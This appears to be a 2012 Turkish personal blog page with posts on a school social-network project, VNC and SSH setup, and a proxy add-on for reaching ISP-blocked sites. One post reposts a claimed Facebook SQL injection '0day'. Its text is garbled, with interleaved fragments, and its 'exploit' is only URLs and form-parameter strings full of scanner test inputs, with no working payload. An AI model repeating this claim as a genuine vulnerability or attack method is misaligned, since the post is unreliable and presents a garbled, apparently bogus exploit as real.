Vedat FETAH Kimdir?

Ege Üniversitesi Bilgi İşlem Daire Başkanlığı bünyesinde kampüs güvenlik sistemleri yöneticisi olarak çalışma hayatıma devam ediyorum. Günlük yaşamda teknoloji ağırlıklı karşılaştığım ve beğendiğim yazıları paylaşmak amacıyla bu bloğu oluşturdum. Umarım birilerinin bilgilenmesini sağlar.

Halen Çalışmakta Olduğum Yer

Halen Ege Üniversitesi Uluslararası Bilgisayar Enstitüsü Binasında Bilgi İşlem Daire Başkanlığın'da çalışmaya devam etmekteyim.

28 Haziran 2012 Perşembe

2012 Yenilikçi Öğretmenler Forumunda Birinci Olan Projemiz Fas'a Gitmeye Hak Kazandı.

2012'ye sayılı günler kala Nedret İlhan Keten İlköğretim Okulu öğretmenlerinden Özdal, Özlem ve Yasemin hocalarımızla yaptığımız görüşme ile ilk tohumları atılan Digitalyerliler.com sitesinin ana hatlarını belirledik. 2012 yılının ilk günleri ile birlikte hayata geçirdiğimiz projenin özellikleri aşağıdaki gibidir:

1. İlköğretim okulu öğrencilerini sosyal sanal ortamdan uzaklaştırmamak ancak bunu yaparken tam kontrolü okul olarak sağlamak,
2. Kurulacak sosyal ağda eğitim ağırlıklı uygulamalara yer vermek,
3. Tamamen öğrenci ve velilerin katılabileceği bir yapı oluşturularak yabancılardan uzak bir ortam oluşturmak,
4. Sistem içerisinde kayıtlı olan herkese veya belirlenen grupların üyelerine özel, dahili veya harici mesaj gönderme özelliği ile üyelerin okul ile ilgili olaylardan haberdar olmasını sağlamak,
5. Öğrencilerin ödevlerini sisteme yüklemesi sağlanarak öğretmenlerimizin iş yükünü hafifletmek ve diğer öğrenci arkadaşların da ödevleri görmesini sağlamak, konu üzerinde tartışma imkanı vermek,
6. Siteye mobil arayüz ile girişi sağlamak, bu sayede mobil olarak sistemi kullanabilmelerini sağlamak,
7. Herkese açık duvar sayesinde öğrencilerin birbirleri ile burada tanışıp kaynaşmalarına olanak sağlamak amacıyla oluşturulmuştur.

Yukarıda belirtilen özelliklerle oluşturmuş olduğum digitalyerliler.com sitesi Yenilikçi Öğretmenler Forumu tarafından açılan 2012 proje yarışmasında içerik kalitesi alanında 1. olmuştur. Ankara'da alınan bu başarı ile Türkiye'de derece sahibi olduk. Ayrıca önceki yıllarda içerik kalitesi bakımından derece yapan projeler gibi Fas'ta yapılacak Dünya yenilikçi öğretmenler forumunda Türkiye'yi temsil edeceğiz. Umarım bu başarı yurt dışı ayaklarında da katlanarak devam eder.

20 Haziran 2012 Çarşamba

Fedora ve Centos Dağıtımları için Vncserver Kurulumu

Aslında çok basit bir işlem olan vncserver kurulumu basit hatalar nedeniyle sizi çileden çıkarabilir. Kurulum için ilk önce vncserver paketinin ve gnome paketlerinin kurulması gerekmektedir. Bu işlemi aşağıdaki komutlar ile yapabilirsiniz:
#yum install gnome*
#yum install vnc-server*
Bu işlemlerden sonra kurulan paketlerin düzenlenmesi gerekmektedir. İlk önce güvenliğiniz için vnc sunucuya bağlantı için bir şifre belirlemek gerekiyor.
#vncpasswd
#password:
#verify password:
Bu işlem tamamlandıktan sonra vncserveri deneme amaçlı çalıştırıp daha sonra diğer ayarlar için kapatıyoruz.
#vncserver :1
Komutuyla vnc sunucu çalıştırılır.
#vncserver -kill :1
Komutuyla da kapatılır.

 Eğer herhangi bir sormun yoksa xstartup dosyasının düzenlenmesi gerekmektedir. Bu işlemi şu şekilde yapabilirsiniz:

#nano ~/.vnc/xstartup

İçinde yazanlar komple silindikten sonra aşağıdaki kodlar eklenir ve dosya kaydedilir.

#!/bin/sh
# Uncomment the following two lines for normal desktop:
# unset SESSION_MANAGER
# exec /etc/X11/xinit/xinitrc
[ -x /etc/vnc/xstartup ] && exec /etc/vnc/xstartup
[ -r $HOME/.Xresources ] && xrdb $HOME/.Xresources
#xsetroot -solid grey
#vncconfig -iconic &
#xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
#twm &
if test -z "$DBUS_SESSION_BUS_ADDRESS" ; then
eval `dbus-launch --sh-syntax –exit-with-session`
echo "D-BUS per-session daemon address is: \
$DBUS_SESSION_BUS_ADDRESS"
fi
exec  gnome-session

Ve son olarak vnc sunucumuzu çalıştırıp uzak bağlantı yapmak kaldı.
#vncserver :1
Komutu ile vncserver bağlantı için çalıştırılır. Vnc bağlantı yazılımının adres kısmına ipadresi:1 olarak bağlantı adresi girilir.

18 Haziran 2012 Pazartesi

Facebook Remote Post Sql Injection Vulnerability


===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : Facebook - Remote Post SQL Injection
Vendor : Facebook
w.facebook.com/ 0day exploits : 1337day.
URL Vendor : http://w wcom Inj3ct0r Exploit DataBase
ION http://www.facebook.com/login.ph
==> SAMPLE REMOTE POST SQL INJEC Tp?login_attempt=1 [ Remote Post SQL Injection ]
[ Remote Post SQL Injection ] http://www.facebook.com/r.php?locale=es_LA&possi
http://www.facebook.com/r.php?possible_fb_user=1 ble_fb_user=1 [ Remote Post SQL Injection ]
p^jsonp=1 [ Remote Post SQL Injection ] https://www.facebook.com/r.php?fbpage_id=205
http://www.facebook.com/find-friends/index.p h31316728 [ Remote Post SQL Injection ] ==> EXPLOIT'S
=€,´,%E2%82%AC,%C2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n&locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&next=http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=not-admgr-user +trynum=1&charset_test=€,´,%E2%82%AC,%C2%B4,
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charset_tes t%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0
sion=0&legacy_return=1 +login_str=wcrtestinput000000&password=wcrtestinput000001&lsd=avo_l9kt&importer_action=2&flow=2&type=1&callback_element_id=&tracked_params=[] +charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persis
+display=&session_key_only=0&trynum=1&charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_se stent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=1 +legacy_return=1&display=&session_key_only=0&trynum=1&charset_test=€,´,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
wtkd6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euuhuq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4brsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmppd9boq5hew&extra_challenge_params=authp=nonce.tt.time.new_audio_default&psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&nonce=cmqamvx4apmppd9boq5hew&tt=ducvyhgabbkslmk3pkqnmd16nqi&time=1339980632&new_audio_default=1&recaptcha_type=password&captcha_response=wcrtestinput000005&sex=0&birthday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bundle=&app_data=&reg_data=&app_id=&fbpage_id=20531316728&reg_oid=20531316728
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&mid=&fid=&reg_dropoff_id=&reg_dropoff_code=&ro_invite_signup_id=737818179100220658&terms=on&abtest_registration_group=1&referrer=&md5pass=&validate_mx_records=1&asked_to_login=0&ab_test_data=&firstname=wcrtestinput000000&lastname=wcrtestinput000001&reg_email__=wcrtestinput000002&reg_email_confirmation__=wcrtestinput000003&reg_passwd__=wcrtestinput000004&captcha_persist_data=aznwcfsbvtu_hsnl9dd z

6 Haziran 2012 Çarşamba

Bactrack 5 Could not load host key: /etc/ssh/ssh_host_key Hatası

Error starting ssh
root@slax:/etc# /usr/sbin/sshd
Could not load host key: /etc/ssh/ssh_host_key
Could not load host key: /etc/ssh/ssh_host_rsa_key

Hatasını almanız durumunda aşağıdaki işlemleri yaparsanız sorununuz düzelir.

ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key -N ''
ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''

SSH'ı Yeniden Başlatın.

1 Haziran 2012 Cuma

Turk Telekom Engelli Siteler

Bazı web sayfaları bazı ülkelerden girişe açıktır sadece. Mesela only USA gibi. Bu sayfalara girişiniz engellenir. Ancak okumak istediğiniz bir makaleye nasıl erişirsiniz? . Deneysel olarak yaptığım denemelerde Sthealthy isimli bir addon browserlara kurulduğunda açılmayan sayfaları açabildiğini bana gösterdi. Ancak bu eklenti sizin ip adresinizi gizlemiyor. Bu nedenle şu veya bu gibi sitelere girmek için kullanın demiyorum. Tamamen deneysel amaçlı olarak anlatılan bu yöntemin bütün sorumluluğu son kullanıcının kendisine aittir.
Yöntem kısaca şöyle özetlenebilir:

1. Öncelikle browserımızı uygun olan eklentiyi ediniyoruz.

2. Eklentileri kuruyoruz.
3. Kurulum bitince tarayıcıyı yeniden başlat uyarısını dikkate alıp yeniden başlatıyoruz.
4. Yeniden açılışta Use a proxy from the following country ................. seçeneğini seçip altındaki kutuya MD kodlarını giriyoruz. MD Moldova'nın (hangi ülkenin sitesine girmek isterseniz o ülkenin kodunu girmelisiniz) kısaltılmışıdır.
5. Browser üzerinde oluşan eklenti ikonu kırmızı uçurtma şeklindedir. Tıklayın yeşil olunca giremediğiniz siteye girmeyi bir daha deneyin.

Örn: Yasal olarak herhangi bir ibare olmadan engellenen bir site ile denemenizi yapabilirsiniz. http://thepiratebay.se adresi normalde açılmayacaktır. Uyarı bile vermeyecektir. Ancak stealthy kurulduktan sonra açmaya çalıştığınızda sitenin geldiğini göreceksiniz. Bu işlem sonunda thepiratebay.se adresinin tamamen Türk Telekom tarafından hiçbir uyarı girilmeksizin engellediği anlamına gelmektedir.

Paylaş

Twitter Delicious Facebook Digg Stumbleupon Favorites